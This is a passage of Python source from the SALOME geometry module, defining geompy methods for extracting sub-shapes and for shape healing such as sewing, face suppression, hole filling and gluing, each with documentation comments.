# selected by their indices in the sorted list of all sub-shapes of type <VAR>aType</VAR>.
# Each index is in range [1, Nb_Sub-Shapes_Of_Given_Type]
# @param aShape Shape to get sub-shape of.
# @param ListOfInd List of sub-shapes indices.
# @param aType Type of sub-shapes to be retrieved (see ShapeType())
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return A compound of sub-shapes of aShape.
#
# @ref swig_all_decompose "Example"
def SubShapeSortedCentres(self, aShape, aType, ListOfInd, theName=None):
"""
Obtain a compound of sub-shapes of aShape,
selected by their indices in the sorted list of all sub-shapes of type aType.
Each index is in range [1, Nb_Sub-Shapes_Of_Given_Type]
Parameters:
aShape Shape to get sub-shape of.
ListOfInd List of sub-shapes indices.
aType Type of sub-shapes to be retrieved (see geompy.ShapeType)
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
A compound of sub-shapes of aShape.
"""
# Example: see GEOM_TestAll.py
ListOfIDs = []
AllShapeIDsList = self.SubShapeAllSortedCentresIDs(aShape, EnumToLong( aType ))
for ind in ListOfInd:
ListOfIDs.append(AllShapeIDsList[ind - 1])
# note: auto-publishing is done in self.GetSubShape()
anObj = self.GetSubShape(aShape, ListOfIDs, theName)
return anObj
## Extract shapes (excluding the main shape) of given type.
# @param aShape The shape.
# @param aType The shape type (see ShapeType())
# @param isSorted Boolean flag to switch sorting on/off.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return List of sub-shapes of type aType, contained in aShape.
#
# @ref swig_FilletChamfer "Example"
@ManageTransactions("ShapesOp")
def ExtractShapes(self, aShape, aType, isSorted = False, theName=None):
"""
Extract shapes (excluding the main shape) of given type.
Parameters:
aShape The shape.
aType The shape type (see geompy.ShapeType)
isSorted Boolean flag to switch sorting on/off.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
List of sub-shapes of type aType, contained in aShape.
"""
# Example: see GEOM_TestAll.py
ListObj = self.ShapesOp.ExtractSubShapes(aShape, EnumToLong( aType ), isSorted)
RaiseIfFailed("ExtractSubShapes", self.ShapesOp)
self._autoPublish(ListObj, theName, "subshape")
return ListObj
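# Hedged usage sketch (illustrative; `geompy` as above). Unlike SubShapeAll,
# ExtractShapes never returns the main shape itself:
#
#   box          = geompy.MakeBoxDXDYDZ(10, 10, 10)
#   sorted_faces = geompy.ExtractShapes(box, geompy.ShapeType["FACE"], True)
#   # isSorted=True orders the faces by their centres of gravity,
#   # giving a stable, reproducible order.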
## Get a set of sub-shapes defined by their unique IDs inside <VAR>aShape</VAR>
# @param aShape Main shape.
# @param anIDs List of unique IDs of sub-shapes inside <VAR>aShape</VAR>.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
# @return List of GEOM.GEOM_Object, corresponding to found sub-shapes.
#
# @ref swig_all_decompose "Example"
@ManageTransactions("ShapesOp")
def SubShapes(self, aShape, anIDs, theName=None):
"""
Get a set of sub-shapes defined by their unique IDs inside aShape
Parameters:
aShape Main shape.
anIDs List of unique IDs of sub-shapes inside aShape.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
List of GEOM.GEOM_Object, corresponding to found sub-shapes.
"""
# Example: see GEOM_TestAll.py
ListObj = self.ShapesOp.MakeSubShapes(aShape, anIDs)
RaiseIfFailed("SubShapes", self.ShapesOp)
self._autoPublish(ListObj, theName, "subshape")
return ListObj
# end of l4_decompose
## @}
## @addtogroup l4_decompose_d
## @{
## Deprecated method
# It works like SubShapeAllSortedCentres(), but wrongly
# defines centres of faces, shells and solids.
@ManageTransactions("ShapesOp")
def SubShapeAllSorted(self, aShape, aType, theName=None):
"""
Deprecated method
It works like geompy.SubShapeAllSortedCentres, but wrongly
defines centres of faces, shells and solids.
"""
ListObj = self.ShapesOp.MakeExplode(aShape, EnumToLong( aType ), True)
RaiseIfFailed("MakeExplode", self.ShapesOp)
self._autoPublish(ListObj, theName, "subshape")
return ListObj
## Deprecated method
# It works like SubShapeAllSortedCentresIDs(), but wrongly
# defines centres of faces, shells and solids.
@ManageTransactions("ShapesOp")
def SubShapeAllSortedIDs(self, aShape, aType):
"""
Deprecated method
It works like geompy.SubShapeAllSortedCentresIDs, but wrongly
defines centres of faces, shells and solids.
"""
ListIDs = self.ShapesOp.SubShapeAllIDs(aShape, EnumToLong( aType ), True)
RaiseIfFailed("SubShapeAllIDs", self.ShapesOp)
return ListIDs
## Deprecated method
# It works like SubShapeSortedCentres(), but has a bug
# (wrongly defines centres of faces, shells and solids).
def SubShapeSorted(self, aShape, aType, ListOfInd, theName=None):
"""
Deprecated method
It works like geompy.SubShapeSortedCentres, but has a bug
(wrongly defines centres of faces, shells and solids).
"""
ListOfIDs = []
AllShapeIDsList = self.SubShapeAllSortedIDs(aShape, EnumToLong( aType ))
for ind in ListOfInd:
ListOfIDs.append(AllShapeIDsList[ind - 1])
# note: auto-publishing is done in self.GetSubShape()
anObj = self.GetSubShape(aShape, ListOfIDs, theName)
return anObj
# end of l4_decompose_d
## @}
## @addtogroup l3_healing
## @{
## Apply a sequence of Shape Healing operators to the given object.
# @param theShape Shape to be processed.
# @param theOperators List of names of operators ("FixShape", "SplitClosedFaces", etc.).
# @param theParameters List of names of parameters
# ("FixShape.Tolerance3d", "SplitClosedFaces.NbSplitPoints", etc.).
# @param theValues List of values of parameters, in the same order
# as parameters are listed in <VAR>theParameters</VAR> list.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# <b> Operators and Parameters: </b> \n
#
# * \b FixShape - corrects invalid shapes. \n
# - \b FixShape.Tolerance3d - work tolerance for detection of the problems and correction of them. \n
# - \b FixShape.MaxTolerance3d - maximal possible tolerance of the shape after correction. \n
#
# * \b FixFaceSize - removes small faces, such as spots and strips.\n
# - \b FixFaceSize.Tolerance - defines minimum possible face size. \n
#
# * \b DropSmallEdges - removes edges, which merge with neighbouring edges. \n
# - \b DropSmallEdges.Tolerance3d - defines minimum possible distance between two parallel edges.\n
#
# * \b SplitAngle - splits faces based on conical surfaces, surfaces of revolution and cylindrical
# surfaces in segments using a certain angle. \n
# - \b SplitAngle.Angle - the central angle of the resulting segments (i.e. we obtain two segments
# if Angle=180, four if Angle=90, etc). \n
# - \b SplitAngle.MaxTolerance - maximum possible tolerance among the resulting segments.\n
#
# * \b SplitClosedFaces - splits closed faces in segments.
# The number of segments depends on the number of splitting points.\n
# - \b SplitClosedFaces.NbSplitPoints - the number of splitting points.\n
#
# * \b SplitContinuity - splits shapes to reduce continuities of curves and surfaces.\n
# - \b SplitContinuity.Tolerance3d - 3D tolerance for correction of geometry.\n
# - \b SplitContinuity.SurfaceContinuity - required continuity for surfaces.\n
# - \b SplitContinuity.CurveContinuity - required continuity for curves.\n
# This and the previous parameters can take the following values:\n
# \b Parametric \b Continuity \n
# \b C0 (Positional Continuity): curves are joined (the end positions of curves or surfaces
# are coincidental. The curves or surfaces may still meet at an angle, giving rise to a sharp corner or edge).\n
# \b C1 (Tangential Continuity): first derivatives are equal (the end vectors of curves or surfaces are parallel,
# ruling out sharp edges).\n
# \b C2 (Curvature Continuity): first and second derivatives are equal (the end vectors of curves or surfaces
# are of the same magnitude).\n
# \b CN N-th derivatives are equal (both the direction and the magnitude of the Nth derivatives of curves
# or surfaces (d/du C(u)) are the same at junction). \n
# \b Geometric \b Continuity \n
# \b G1: first derivatives are proportional at junction.\n
# The curve tangents thus have the same direction, but not necessarily the same magnitude.
# i.e., C1'(1) = (a,b,c) and C2'(0) = (k*a, k*b, k*c).\n
# \b G2: first and second derivatives are proportional at junction.
# As the names imply, geometric continuity requires the geometry to be continuous, while parametric
# continuity requires that the underlying parameterization be continuous as well.
# Parametric continuity of order n implies geometric continuity of order n, but not vice-versa.\n
#
# * \b BsplineRestriction - converts curves and surfaces to Bsplines and processes them with the following parameters:\n
# - \b BSplineRestriction.SurfaceMode - approximation of surfaces if restriction is necessary.\n
# - \b BSplineRestriction.Curve3dMode - conversion of any 3D curve to BSpline and approximation.\n
# - \b BSplineRestriction.Curve2dMode - conversion of any 2D curve to BSpline and approximation.\n
# - \b BSplineRestriction.Tolerance3d - defines the possibility of surfaces and 3D curves approximation
# with the specified parameters.\n
# - \b BSplineRestriction.Tolerance2d - defines the possibility of surfaces and 2D curves approximation
# with the specified parameters.\n
# - \b BSplineRestriction.RequiredDegree - required degree of the resulting BSplines.\n
# - \b BSplineRestriction.RequiredNbSegments - required maximum number of segments of resultant BSplines.\n
# - \b BSplineRestriction.Continuity3d - continuity of the resulting surfaces and 3D curves.\n
# - \b BSplineRestriction.Continuity2d - continuity of the resulting 2D curves.\n
#
# * \b ToBezier - converts curves and surfaces of any type to Bezier curves and surfaces.\n
# - \b ToBezier.SurfaceMode - if checked in, allows conversion of surfaces.\n
# - \b ToBezier.Curve3dMode - if checked in, allows conversion of 3D curves.\n
# - \b ToBezier.Curve2dMode - if checked in, allows conversion of 2D curves.\n
# - \b ToBezier.MaxTolerance - defines tolerance for detection and correction of problems.\n
#
# * \b SameParameter - fixes edges of 2D and 3D curves not having the same parameter.\n
# - \b SameParameter.Tolerance3d - defines tolerance for fixing of edges.\n
#
#
# @return New GEOM.GEOM_Object, containing processed shape.
#
# \n @ref tui_shape_processing "Example"
@ManageTransactions("HealOp")
def ProcessShape(self, theShape, theOperators, theParameters, theValues, theName=None):
"""
Apply a sequence of Shape Healing operators to the given object.
Parameters:
theShape Shape to be processed.
theOperators List of names of operators ("FixShape", "SplitClosedFaces", etc.).
theParameters List of names of parameters
              ("FixShape.Tolerance3d", "SplitClosedFaces.NbSplitPoints", etc.).
theValues List of values of parameters, in the same order
          as parameters are listed in theParameters list.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Operators and Parameters:
* FixShape - corrects invalid shapes.
* FixShape.Tolerance3d - work tolerance for detection of the problems and correction of them.
* FixShape.MaxTolerance3d - maximal possible tolerance of the shape after correction.
* FixFaceSize - removes small faces, such as spots and strips.
* FixFaceSize.Tolerance - defines minimum possible face size.
* DropSmallEdges - removes edges, which merge with neighbouring edges.
* DropSmallEdges.Tolerance3d - defines minimum possible distance between two parallel edges.
* SplitAngle - splits faces based on conical surfaces, surfaces of revolution and cylindrical surfaces
in segments using a certain angle.
* SplitAngle.Angle - the central angle of the resulting segments (i.e. we obtain two segments
if Angle=180, four if Angle=90, etc).
* SplitAngle.MaxTolerance - maximum possible tolerance among the resulting segments.
* SplitClosedFaces - splits closed faces in segments. The number of segments depends on the number of
splitting points.
* SplitClosedFaces.NbSplitPoints - the number of splitting points.
* SplitContinuity - splits shapes to reduce continuities of curves and surfaces.
* SplitContinuity.Tolerance3d - 3D tolerance for correction of geometry.
* SplitContinuity.SurfaceContinuity - required continuity for surfaces.
* SplitContinuity.CurveContinuity - required continuity for curves.
This and the previous parameters can take the following values:
Parametric Continuity:
C0 (Positional Continuity): curves are joined (the end positions of curves or surfaces are
coincidental. The curves or surfaces may still meet at an angle,
giving rise to a sharp corner or edge).
C1 (Tangential Continuity): first derivatives are equal (the end vectors of curves or surfaces
are parallel, ruling out sharp edges).
C2 (Curvature Continuity): first and second derivatives are equal (the end vectors of curves
or surfaces are of the same magnitude).
CN N-th derivatives are equal (both the direction and the magnitude of the Nth derivatives of
curves or surfaces (d/du C(u)) are the same at junction).
Geometric Continuity:
G1: first derivatives are proportional at junction.
The curve tangents thus have the same direction, but not necessarily the same magnitude.
i.e., C1'(1) = (a,b,c) and C2'(0) = (k*a, k*b, k*c).
G2: first and second derivatives are proportional at junction. As the names imply,
geometric continuity requires the geometry to be continuous, while parametric continuity requires
that the underlying parameterization be continuous as well. Parametric continuity of order n implies
geometric continuity of order n, but not vice-versa.
* BsplineRestriction - converts curves and surfaces to Bsplines and processes them with the following parameters:
* BSplineRestriction.SurfaceMode - approximation of surfaces if restriction is necessary.
* BSplineRestriction.Curve3dMode - conversion of any 3D curve to BSpline and approximation.
* BSplineRestriction.Curve2dMode - conversion of any 2D curve to BSpline and approximation.
* BSplineRestriction.Tolerance3d - defines the possibility of surfaces and 3D curves approximation with
the specified parameters.
* BSplineRestriction.Tolerance2d - defines the possibility of surfaces and 2D curves approximation with
the specified parameters.
* BSplineRestriction.RequiredDegree - required degree of the resulting BSplines.
* BSplineRestriction.RequiredNbSegments - required maximum number of segments of resultant BSplines.
* BSplineRestriction.Continuity3d - continuity of the resulting surfaces and 3D curves.
* BSplineRestriction.Continuity2d - continuity of the resulting 2D curves.
* ToBezier - converts curves and surfaces of any type to Bezier curves and surfaces.
* ToBezier.SurfaceMode - if checked in, allows conversion of surfaces.
* ToBezier.Curve3dMode - if checked in, allows conversion of 3D curves.
* ToBezier.Curve2dMode - if checked in, allows conversion of 2D curves.
* ToBezier.MaxTolerance - defines tolerance for detection and correction of problems.
* SameParameter - fixes edges of 2D and 3D curves not having the same parameter.
* SameParameter.Tolerance3d - defines tolerance for fixing of edges.
Returns:
New GEOM.GEOM_Object, containing processed shape.
Note: For more information look through SALOME Geometry User's Guide ->
      Introduction to Geometry -> Repairing Operations -> Shape Processing
"""
# Example: see GEOM_TestHealing.py
theValues,Parameters = ParseList(theValues)
anObj = self.HealOp.ProcessShape(theShape, theOperators, theParameters, theValues)
# To avoid script failure in case of good argument shape
if self.HealOp.GetErrorCode() == "ShHealOper_NotError_msg":
return theShape
RaiseIfFailed("ProcessShape", self.HealOp)
# build the notebook parameters string: prepend one empty slot
# per operator/parameter name
for string in (theOperators + theParameters):
    Parameters = ":" + Parameters
    pass
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "healed")
return anObj
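# Hedged usage sketch (not part of the original file; `geompy` as above, and
# `shape` stands for any previously created or imported shape; values are
# passed as strings, as in the GEOM healing test scripts):
#
#   healed = geompy.ProcessShape(shape,
#                                ["FixShape", "SplitClosedFaces"],
#                                ["FixShape.Tolerance3d",
#                                 "SplitClosedFaces.NbSplitPoints"],
#                                ["1e-7", "1"], "healed")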
## Remove faces from the given object (shape).
# @param theObject Shape to be processed.
# @param theFaces Indices of faces to be removed, if EMPTY then the method
# removes ALL faces of the given object.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing processed shape.
#
# @ref tui_suppress_faces "Example"
@ManageTransactions("HealOp")
def SuppressFaces(self, theObject, theFaces, theName=None):
"""
Remove faces from the given object (shape).
Parameters:
theObject Shape to be processed.
theFaces Indices of faces to be removed, if EMPTY then the method
removes ALL faces of the given object.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing processed shape.
"""
# Example: see GEOM_TestHealing.py
anObj = self.HealOp.SuppressFaces(theObject, theFaces)
RaiseIfFailed("SuppressFaces", self.HealOp)
self._autoPublish(anObj, theName, "suppressFaces")
return anObj
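# Hedged usage sketch (illustrative; `geompy` as above): removing one face
# of a box yields an open shell:
#
#   box   = geompy.MakeBoxDXDYDZ(10, 10, 10)
#   faces = geompy.SubShapeAll(box, geompy.ShapeType["FACE"])
#   fid   = geompy.GetSubShapeID(box, faces[0])
#   shell = geompy.SuppressFaces(box, [fid], "openBox")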
## Sewing of some shapes into a single shape.
# @param ListShape Shapes to be processed.
# @param theTolerance Required tolerance value.
# @param AllowNonManifold Flag that allows non-manifold sewing.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing processed shape.
#
# @ref tui_sewing "Example"
def MakeSewing(self, ListShape, theTolerance, AllowNonManifold=False, theName=None):
"""
Sewing of some shapes into a single shape.
Parameters:
ListShape Shapes to be processed.
theTolerance Required tolerance value.
AllowNonManifold Flag that allows non-manifold sewing.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing processed shape.
"""
# Example: see GEOM_TestHealing.py
comp = self.MakeCompound(ListShape)
# note: auto-publishing is done in self.Sew()
anObj = self.Sew(comp, theTolerance, AllowNonManifold, theName)
return anObj
## Sewing of the given object.
# @param theObject Shape to be processed.
# @param theTolerance Required tolerance value.
# @param AllowNonManifold Flag that allows non-manifold sewing.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing processed shape.
@ManageTransactions("HealOp")
def Sew(self, theObject, theTolerance, AllowNonManifold=False, theName=None):
"""
Sewing of the given object.
Parameters:
theObject Shape to be processed.
theTolerance Required tolerance value.
AllowNonManifold Flag that allows non-manifold sewing.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing processed shape.
"""
# Example: see MakeSewing() above
theTolerance,Parameters = ParseParameters(theTolerance)
if AllowNonManifold:
anObj = self.HealOp.SewAllowNonManifold(theObject, theTolerance)
else:
anObj = self.HealOp.Sew(theObject, theTolerance)
# To avoid script failure in case of good argument shape
if self.HealOp.GetErrorCode() == "ShHealOper_NotError_msg":
return theObject
RaiseIfFailed("Sew", self.HealOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "sewed")
return anObj
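# Hedged usage sketch (illustrative; `geompy` as above, and `face_a`/`face_b`
# are assumed to be faces whose borders coincide within the tolerance):
#
#   sewed = geompy.MakeSewing([face_a, face_b], 1e-6)
#   # equivalent to sewing their compound directly:
#   # sewed = geompy.Sew(geompy.MakeCompound([face_a, face_b]), 1e-6)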
## Rebuild the topology of theCompound of solids by removing
# the faces that are shared by several solids.
# @param theCompound Shape to be processed.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing processed shape.
#
# @ref tui_remove_webs "Example"
@ManageTransactions("HealOp")
def RemoveInternalFaces (self, theCompound, theName=None):
"""
Rebuild the topology of theCompound of solids by removing
the faces that are shared by several solids.
Parameters:
theCompound Shape to be processed.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing processed shape.
"""
# Example: see GEOM_TestHealing.py
anObj = self.HealOp.RemoveInternalFaces(theCompound)
RaiseIfFailed("RemoveInternalFaces", self.HealOp)
self._autoPublish(anObj, theName, "removeWebs")
return anObj
## Remove internal wires and edges from the given object (face).
# @param theObject Shape to be processed.
# @param theWires Indices of wires to be removed, if EMPTY then the method
# removes ALL internal wires of the given object.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing processed shape.
#
# @ref tui_suppress_internal_wires "Example"
@ManageTransactions("HealOp")
def SuppressInternalWires(self, theObject, theWires, theName=None):
"""
Remove internal wires and edges from the given object (face).
Parameters:
theObject Shape to be processed.
theWires Indices of wires to be removed, if EMPTY then the method
removes ALL internal wires of the given object.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing processed shape.
"""
# Example: see GEOM_TestHealing.py
anObj = self.HealOp.RemoveIntWires(theObject, theWires)
RaiseIfFailed("RemoveIntWires", self.HealOp)
self._autoPublish(anObj, theName, "suppressWires")
return anObj
## Remove internal closed contours (holes) from the given object.
# @param theObject Shape to be processed.
# @param theWires Indices of wires to be removed, if EMPTY then the method
# removes ALL internal holes of the given object
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing processed shape.
#
# @ref tui_suppress_holes "Example"
@ManageTransactions("HealOp")
def SuppressHoles(self, theObject, theWires, theName=None):
"""
Remove internal closed contours (holes) from the given object.
Parameters:
theObject Shape to be processed.
theWires Indices of wires to be removed, if EMPTY then the method
removes ALL internal holes of the given object
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing processed shape.
"""
# Example: see GEOM_TestHealing.py
anObj = self.HealOp.FillHoles(theObject, theWires)
RaiseIfFailed("FillHoles", self.HealOp)
self._autoPublish(anObj, theName, "suppressHoles")
return anObj
## Close an open wire.
# @param theObject Shape to be processed.
# @param theWires Indexes of edge(s) and wire(s) to be closed within <VAR>theObject</VAR>'s shape,
# if [ ], then <VAR>theObject</VAR> itself is a wire.
# @param isCommonVertex If True : closure by creation of a common vertex,
# If False : closure by creation of an edge between ends.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing processed shape.
#
# @ref tui_close_contour "Example"
@ManageTransactions("HealOp")
def CloseContour(self,theObject, theWires, isCommonVertex, theName=None):
"""
Close an open wire.
Parameters:
theObject Shape to be processed.
theWires Indexes of edge(s) and wire(s) to be closed within theObject's shape,
if [ ], then theObject itself is a wire.
isCommonVertex If True : closure by creation of a common vertex,
If False : closure by creation of an edge between ends.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing processed shape.
"""
# Example: see GEOM_TestHealing.py
anObj = self.HealOp.CloseContour(theObject, theWires, isCommonVertex)
RaiseIfFailed("CloseContour", self.HealOp)
self._autoPublish(anObj, theName, "closeContour")
return anObj
## Addition of a point to a given edge object.
# @param theObject Shape to be processed.
# @param theEdgeIndex Index of edge to be divided within theObject's shape,
# if -1, then theObject itself is the edge.
# @param theValue Value of parameter on edge or length parameter,
# depending on \a isByParameter.
# @param isByParameter If TRUE : \a theValue is treated as a curve parameter [0..1], \n
# if FALSE : \a theValue is treated as a length parameter [0..1]
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing processed shape.
#
# @ref tui_add_point_on_edge "Example"
@ManageTransactions("HealOp")
def DivideEdge(self, theObject, theEdgeIndex, theValue, isByParameter, theName=None):
"""
Addition of a point to a given edge object.
Parameters:
theObject Shape to be processed.
theEdgeIndex Index of edge to be divided within theObject's shape,
if -1, then theObject itself is the edge.
theValue Value of parameter on edge or length parameter,
depending on isByParameter.
isByParameter If TRUE : theValue is treated as a curve parameter [0..1],
if FALSE : theValue is treated as a length parameter [0..1]
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing processed shape.
"""
# Example: see GEOM_TestHealing.py
theEdgeIndex,theValue,isByParameter,Parameters = ParseParameters(theEdgeIndex,theValue,isByParameter)
anObj = self.HealOp.DivideEdge(theObject, theEdgeIndex, theValue, isByParameter)
RaiseIfFailed("DivideEdge", self.HealOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "divideEdge")
return anObj
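# Hedged usage sketch (illustrative; `geompy` as above): add a vertex at the
# middle of one box edge (theValue=0.5, treated as a curve parameter):
#
#   box   = geompy.MakeBoxDXDYDZ(10, 10, 10)
#   edges = geompy.SubShapeAll(box, geompy.ShapeType["EDGE"])
#   eid   = geompy.GetSubShapeID(box, edges[0])
#   div   = geompy.DivideEdge(box, eid, 0.5, True, "dividedBox")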
## Suppress the vertices in the wire if the adjacent edges are C1 continuous.
# @param theWire Wire to minimize the number of C1 continuous edges in.
# @param theVertices A list of vertices to suppress. If the list
# is empty, all vertices in a wire will be assumed.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object with modified wire.
#
# @ref tui_fuse_collinear_edges "Example"
@ManageTransactions("HealOp")
def FuseCollinearEdgesWithinWire(self, theWire, theVertices = [], theName=None):
"""
Suppress the vertices in the wire if the adjacent edges are C1 continuous.
Parameters:
theWire Wire to minimize the number of C1 continuous edges in.
theVertices A list of vertices to suppress. If the list
is empty, all vertices in a wire will be assumed.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object with modified wire.
"""
anObj = self.HealOp.FuseCollinearEdgesWithinWire(theWire, theVertices)
RaiseIfFailed("FuseCollinearEdgesWithinWire", self.HealOp)
self._autoPublish(anObj, theName, "fuseEdges")
return anObj
## Change orientation of the given object. Updates given shape.
# @param theObject Shape to be processed.
# @return Updated <var>theObject</var>
#
# @ref swig_todo "Example"
@ManageTransactions("HealOp")
def ChangeOrientationShell(self,theObject):
"""
Change orientation of the given object. Updates given shape.
Parameters:
theObject Shape to be processed.
Returns:
Updated theObject
"""
theObject = self.HealOp.ChangeOrientation(theObject)
RaiseIfFailed("ChangeOrientation", self.HealOp)
return theObject
## Change orientation of the given object.
# @param theObject Shape to be processed.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing processed shape.
#
# @ref swig_todo "Example"
@ManageTransactions("HealOp")
def ChangeOrientationShellCopy(self, theObject, theName=None):
"""
Change orientation of the given object.
Parameters:
theObject Shape to be processed.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing processed shape.
"""
anObj = self.HealOp.ChangeOrientationCopy(theObject)
RaiseIfFailed("ChangeOrientationCopy", self.HealOp)
self._autoPublish(anObj, theName, "reversed")
return anObj
## Try to limit tolerance of the given object by value \a theTolerance.
# @param theObject Shape to be processed.
# @param theTolerance Required tolerance value.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing processed shape.
#
# @ref tui_limit_tolerance "Example"
@ManageTransactions("HealOp")
def LimitTolerance(self, theObject, theTolerance = 1e-07, theName=None):
"""
Try to limit tolerance of the given object by value theTolerance.
Parameters:
theObject Shape to be processed.
theTolerance Required tolerance value.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing processed shape.
"""
anObj = self.HealOp.LimitTolerance(theObject, theTolerance)
RaiseIfFailed("LimitTolerance", self.HealOp)
self._autoPublish(anObj, theName, "limitTolerance")
return anObj
## Get a list of wires (wrapped in GEOM.GEOM_Object-s),
# that constitute a free boundary of the given shape.
# @param theObject Shape to get free boundary of.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return [\a status, \a theClosedWires, \a theOpenWires]
# \n \a status: FALSE, if any error(s) occurred during the method execution.
# \n \a theClosedWires: Closed wires on the free boundary of the given shape.
# \n \a theOpenWires: Open wires on the free boundary of the given shape.
#
# @ref tui_measurement_tools_page "Example"
@ManageTransactions("HealOp")
def GetFreeBoundary(self, theObject, theName=None):
"""
Get a list of wires (wrapped in GEOM.GEOM_Object-s),
that constitute a free boundary of the given shape.
Parameters:
theObject Shape to get free boundary of.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
[status, theClosedWires, theOpenWires]
status: FALSE, if any error(s) occurred during the method execution.
theClosedWires: Closed wires on the free boundary of the given shape.
theOpenWires: Open wires on the free boundary of the given shape.
"""
# Example: see GEOM_TestHealing.py
anObj = self.HealOp.GetFreeBoundary(theObject)
RaiseIfFailed("GetFreeBoundary", self.HealOp)
self._autoPublish(anObj[1], theName, "closedWire")
self._autoPublish(anObj[2], theName, "openWire")
return anObj
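# Hedged usage sketch (illustrative; `geompy` as above, and `shell` is assumed
# to be an open shell, e.g. the result of the SuppressFaces sketch above):
#
#   status, closed_wires, open_wires = geompy.GetFreeBoundary(shell)
#   # status is FALSE if an error occurred; the two lists hold the
#   # closed and open wires of the free boundary, respectively.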
## Replace coincident faces in theShape by one face.
# @param theShape Initial shape.
# @param theTolerance Maximum distance between faces, which can be considered as coincident.
# @param doKeepNonSolids If FALSE, only solids will present in the result,
# otherwise all initial shapes.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing a copy of theShape without coincident faces.
#
# @ref tui_glue_faces "Example"
@ManageTransactions("ShapesOp")
def MakeGlueFaces(self, theShape, theTolerance, doKeepNonSolids=True, theName=None):
"""
Replace coincident faces in theShape by one face.
Parameters:
theShape Initial shape.
theTolerance Maximum distance between faces, which can be considered as coincident.
doKeepNonSolids If FALSE, only solids will present in the result,
otherwise all initial shapes.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing a copy of theShape without coincident faces.
"""
# Example: see GEOM_Spanner.py
theTolerance,Parameters = ParseParameters(theTolerance)
anObj = self.ShapesOp.MakeGlueFaces(theShape, theTolerance, doKeepNonSolids)
if anObj is None:
raise RuntimeError, "MakeGlueFaces : " + self.ShapesOp.GetErrorCode()
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "glueFaces")
return anObj
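# Hedged usage sketch (illustrative; `geompy` as above): two boxes sharing a
# face are glued so the coincident faces appear only once in the result:
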